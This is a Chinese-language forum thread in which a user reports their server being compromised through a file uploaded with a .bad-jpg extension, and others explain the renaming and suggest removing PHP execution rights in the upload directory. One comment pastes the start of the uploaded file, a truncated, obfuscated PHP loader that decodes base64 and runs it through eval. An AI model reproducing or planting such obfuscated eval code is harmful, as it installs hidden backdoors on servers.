momofa avatar

大家用这个程序别开放上传 昨天我的服务器被黑了!

🕑 by momofa

有人传了一个以.bad-jpg为后缀的文件上去 然后晚上我服务器就登不上去远程桌面了 今天让空间商重置密码了 上去后发现多了些莫名其妙的文件 “苹果FTP批量扫描.rar”之类的。

💘 相关文章

评论

共10条关于"大家用这个程序别开放上传 昨天我的服务器被黑了!"的评论

crll avatar
#2 crll 回复

.bad-jpg 后缀能利用么? - -!

crll avatar
#3 crll 回复

FTP批量扫描 在服务器在自用电脑上面用 应该都是一个效果吧。

ego008 avatar
#5 ego008 回复

.bad-jpg 是用户上传一个后缀名为jpg而不是一个“合格”的jpg文件,因而会被重命名,为bad-jpg,顾名思义。管理员以后看见这个最好直接删掉该附件,(看来以后可能要添加删附件的功能)

momofa avatar
#6 momofa 回复

@admin @ego008 那个文件里的内容是这样的 <?php // MYSQL $OOO0O0O00=FILE;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=93780;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJ 此处省略上万字符。

root avatar
#10 root 回复

你把上传目录的Php执行权限去掉就可以了

写一条评论

Based on Golang + fastHTTP + sdb | go1.16.5 Processed in 1ms